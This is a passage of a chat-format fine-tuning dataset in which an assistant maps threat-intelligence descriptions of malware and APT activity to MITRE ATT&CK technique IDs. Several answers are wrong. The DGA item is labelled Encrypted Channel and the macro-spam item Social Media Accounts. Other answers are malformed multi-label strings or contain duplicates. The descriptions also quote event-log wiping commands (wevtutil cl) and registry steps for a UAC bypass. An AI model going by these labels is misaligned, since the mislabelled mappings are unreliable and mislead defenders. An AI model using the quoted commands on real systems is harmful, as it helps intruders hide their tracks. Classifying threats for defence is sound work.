{ "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Daserf — This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. Datper uses an RC4-encrypted configuration to obfuscate HTTP traffic. xxmm (also known as Minzen) — This RAT and likely successor to Daserf AES-encrypts HTTP communications using a one-time encryption key. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. T-SMB Scan — This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BONDUPDATER script, which was named based on the hard-coded string “B007”, uses a custom DGA algorithm to generate subdomains for communication with the C2 server" }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "certutil has been used to decode binaries hidden inside certificate files as Base64 information." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Donut can download and execute previously staged shellcode payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LiteDuke can securely delete files by first writing random data to the file." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike can use self signed Java applets to execute signed applet attacks." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DustySky has two hard-coded domains for C2 servers; if the first does not respond, it will try the second." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gelsemium can decompress and decrypt DLLs and shellcode." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can record sound using input audio devices." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can download and execute additional files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bisonal used multiple lure documents to entice their victims to open and then be infected with Bisonal malware. Finally, in 2018, Ahnlab released a paper about \"Operation Bitter Biscuit\" where Bisonal was used against Korean and Japanese entities. This is an application document that has been used to provide a decoy to the Bisonal malware. The attacker also implemented a new order: execution of a command by using named pipe to get the output of the executed command. This mechanism allows the malware to execute API functions without ever using the Call instruction, making it difficult to perform the analysis. So that it ensures the thread has a chance to run, it will return the API call sleep() no matter what was originally requested. Office Extension . In 2019, the actor behind Bisonal used a new way to deploy the machine on the target's systems. The purpose of the malware is to deploy Bisonal on the infected system ($tmp$\\tmplogon.exe) and to create a Run registry key in order to execute Bisonal at the next reboot of the system. The attacker implements indirect API calls by using GetProcAddress() and LoadLibrary() API. Even if Bisonal could be considered as simple with less than 30 functions, it has spent its life targeting sensitive entities in both the public and private sectors" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST created VBScripts that were named after existing services or folders to blend into legitimate activities." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Volatile Cedar can deploy additional tools." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "admin@338 has attempted to get victims to launch malicious Microsoft Word attachments delivered via spearphishing emails." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Enables remote login - Enables screen sharing - Configures remote login permissions for the user - Allows remote login to all - Enables a hidden “root” account in macOS and sets the password specified in the Trojan code" }, { "role": "assistant", "content": "T1569.001 - System Services: Launchctl" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 has set up and operated websites to gather information and deliver malware." }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Observed vulnerabilities include: CVE-2012-0158 CVE-2017-0199 CVE-2017-8759 CVE-2017-11882 Figure 2: APT40 attack lifecycle Establish Foothold APT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory’s content via ReadProcessMemory() API two chunks at a time. It then captures Track 1 and Track 2 credit card (CC) data. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. Other versions may just encode the plain Credit Card Data it with Base64" }, { "role": "assistant", "content": "T1005 - Data from Local System', 'T1560 - Archive Collected Data" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BLINDINGCAN has been signed with code-signing certificates such as CodeRipper." }, { "role": "assistant", "content": "T1553.002 - Code Signing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A file stealer has the capability to steal data from newly connected logical volumes on a system, including USB drives." }, { "role": "assistant", "content": "T1025 - Data from Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "As can be seen in the figure above, the packer used for CVE-2019-0803 is very similar to the one used in CVE-2017-0005. The file was compiled on September 18, 2018, and is also internally named “Add.dll”. Like the previously packed exploit, CVE-2019-0803 also has an export function named “AddByGod” and contains debug information" }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Unique User-Agents The unique User-Agents used in the HTTP communication between SpeakUp to the C&C are a possible path to the identity of the threat actor behind this campaign" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ragnar Locker has used VirtualBox and a stripped Windows XP virtual machine to run itself. The use of a shared folder specified in the configuration enables Ragnar Locker to encrypt files on the host operating system, including files on any mapped drives." }, { "role": "assistant", "content": "T1564.006 - Run Virtual Instance" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Another interesting finding is that Bazar Loader has now implemented a Domain Generation Algorithm using the current date as a seed" }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BBSRAT uses Expand to decompress a CAB file into executable content." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware SierraAlfa accesses the ADMIN$ share via SMB to conduct lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The directory creation.  Downloading the Payloads The remote XSL script downloads twelve files from the C2 server that masquerade themselves as JPEG, GIF, and extensionless files" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TA505 has decrypted packed DLLs with an XOR key." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Strike has the ability to accept a value for HTTP Host Header to enable domain fronting." }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Discovery of a Stealthy New Malware: “CSPY Downloader” is a tool designed to evade analysis and download additional payloads" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com" }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Wocao, the threat actors deleted all Windows system and security event logs using `/Q /c wevtutil cl system` and `/Q /c wevtutil cl security`." }, { "role": "assistant", "content": "T1070.001 - Indicator Removal on Host: Clear Windows Event Logs" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Variants of achieve persistence by using DLL search order hijacking, usually by copying the DLL file to %SYSTEMROOT% (C:\\WINDOWS\\ntshrui.dll)." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "We detect the attachment file as W97M/Adnel or MHT/Dloader. This macro malware is usually attached in the spam emails as .doc files. It uses social engineering tricks to be able to run the malicious macro script that is disabled by default in Microsoft Office." }, { "role": "assistant", "content": "T1586.001 - Social Media Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WastedLocker checks for specific registry keys related to the \"UCOMIEnumConnections\" and \"IActiveScriptParseProcedure32\" interfaces." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ember Bear has obtained and used open source scripts from GitHub." }, { "role": "assistant", "content": "T1588.002 - Tool" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications" }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "While we do not have data supporting targeting information or telemetry, we know the document was created in January 2018 and likely used in an attack around that time frame. The QUADAGENT payload dropped by the delivery document had the filename AdobeAcrobatLicenseVerify.ps1 and used acrobatverify[.]com for its C2. This IP and msoffice-cdn[.]com were both previously referenced in our first report on an OilRig attack using the ThreeDollars delivery document. We used this QUADAGENT payload when testing the Invoke-Obfuscation tool mentioned in this blog. QUADAGENT Analysis The final payload delivered in all three attack waves is a PowerShell downloader referred to by other research organizations as QUADAGENT. The downloaders in these attacks were configured to use both rdppath[.]com and cpuproc[.]com as their C2 servers. When communicating with its C2 server, the downloaders use multiple protocols, specifically HTTPS, HTTP or DNS, each of which provide a fallback channel in that order. For instance, the downloader will first attempt to communicate with its C2 server using an HTTPS request. Lastly, if the HTTP request is not successful, the downloader will fallback to using DNS tunneling to establish communications. We provide more on the specific usage of these protocols as we discuss the inner workings of this malware in this section" }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The White Company has obfuscated their payloads through packing." }, { "role": "assistant", "content": "T1027.002 - Obfuscated Files or Information: Software Packing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can delete files off the system." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Evilnum can steal cookies and session information from browsers." }, { "role": "assistant", "content": "T1539 - Steal Web Session Cookie" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "stores itself in ~/Library/.DS_Stores/" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This blog details the markers of this campaign, including macro content, campaign flow and phishing themes of our identified variants and older variants that have been attributed to Lazarus by other vendors. The Qualys Research Team recently identified a new Lazarus campaign using employment phishing lures targeting the defence sector. This is thematically similar to other observed variants where Lazarus has posed as defence companies like Northrop Grumman and BAE Systems with job openings. LockHeed Recruitment Lure . The macro uses aliases to rename the APIs that it uses (fig. 5). Other variants have used the UuidFromStringA function to decode the embedded payload and write it to an executable Heap. Lazarus has also used other novel methods to execute shellcode such as by using the function EnumSystemLocalesA as a callback to shellcode written to executable heap. 8). shellObj is the Wscript.Shell object that the vbs file uses to execute the beacon command. Additional vendors have also identified a variant that uses pcalua.exe. Additional vendors have reported on the current campaign while attributing it to Lazarus. Lazarus continues to evolve its capabilities by utilizing lesser-known shellcode execution techniques and incorporating various lolbins as part of its campaign" }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses reflective DLL injection to inject the malicious library and execute the RAT." }, { "role": "assistant", "content": "T1055 - Process Injection" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore creates a new key pair with \"ssh-keygen\" and drops the newly created user key in \"authorized_keys\" to enable remote login." }, { "role": "assistant", "content": "T1098.004 - SSH Authorized Keys" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Creates a new registry key HKCU\\Software\\Classes\\Folder\\shell\\open\\command - Sets the “Default” value to “path of the malware” - Creates a value “DelegateExecute” and sets the value to “0” - Executes %systemDirectory%sdclt.exe to bypass the UAC as shown below (figure 7" }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ngrok can provide DGA for C2 servers through the use of random URL strings that change every 12 hours." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The dropper has masqueraded a copy of the infected system's rundll32.exe executable that was moved to the malware's install directory and renamed according to a predefined configuration file." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of downloading remote files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG : Hello ,my name is  , Im ready my Computer Name is:   All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with “AS_” or “AF_”" }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery', 'T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. It also does not use FTP for exfiltration" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Derusbi is capable of obtaining directory, file, and drive listings." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Initial access via a phishing email that linked to a google docs page that enticed the user to download a report, which was a Bazar Loader executable file instead Report-Review20-10.exe" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TajMahal has the ability to identify the Internet Explorer (IE) version on an infected host." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CosmicDuke searches attached and mounted drives for file extensions and keywords that match a predefined list." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "DownPaper uses the command line." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kazuar gathers information about network adapters." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager." }, { "role": "assistant", "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad uses a DGA that is based on the day of the month for C2 servers." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APIs and strings in some variants are RC4 encrypted. Another variant is encoded with XOR." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ramsay has used base64 to encode its C2 traffic." }, { "role": "assistant", "content": "T1132.001 - Data Encoding: Standard Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Saint Bot has relied upon users to execute a malicious attachment delivered via spearphishing." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A file stealer can gather the victim's username to send to a C2 server." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed executing malware shellcode and batch files to establish new services to enable persistence" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Viewing results Commands scheduled with at run as background processes. Output is not displayed on the computer screen. To redirect output to a file, use the redirection symbol (>). If you redirect output to a file, you need to use the escape symbol (^) before the redirection symbol, whether you are using at at the command line or in a batch file. For example, to redirect output to Output.text, type: at 14:45 c:\\test.bat ^>c:\\output.txt The current directory for the executing command is the systemroot folder. Changing system time If you change the system time at a computer after you schedule a command to run with at, synchronize the at scheduler with the revised system time by typing at without command-line options. Storing commands Scheduled commands are stored in the registry. As a result, you do not lose scheduled tasks if you restart the Schedule service. Connecting to network drives Do not use a redirected drive for scheduled jobs that access the network. The Schedule service might not be able to access the redirected drive, or the redirected drive might not be present if a different user is logged on at the time the scheduled task runs. Instead, use UNC paths for scheduled jobs" }, { "role": "assistant", "content": "T1053.002 - Scheduled Task/Job: At" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pay2Key has sent its public key to the C2 server over TCP." }, { "role": "assistant", "content": "T1095 - Non-Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Clambling has the ability to communicate over HTTP." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ShadowPad has decrypted a binary blob to start execution." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory" }, { "role": "assistant", "content": "T1564 - Hide Artifacts', 'T1564 - Hide Artifacts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Goopy has the ability to enumerate the infected system's user name via \"GetUserNameW\"." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group malware TangoDelta attempts to terminate various processes associated with McAfee. Additionally, Lazarus Group malware SHARPKNOT disables the Microsoft Windows System Event Notification and Alerter services.." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": 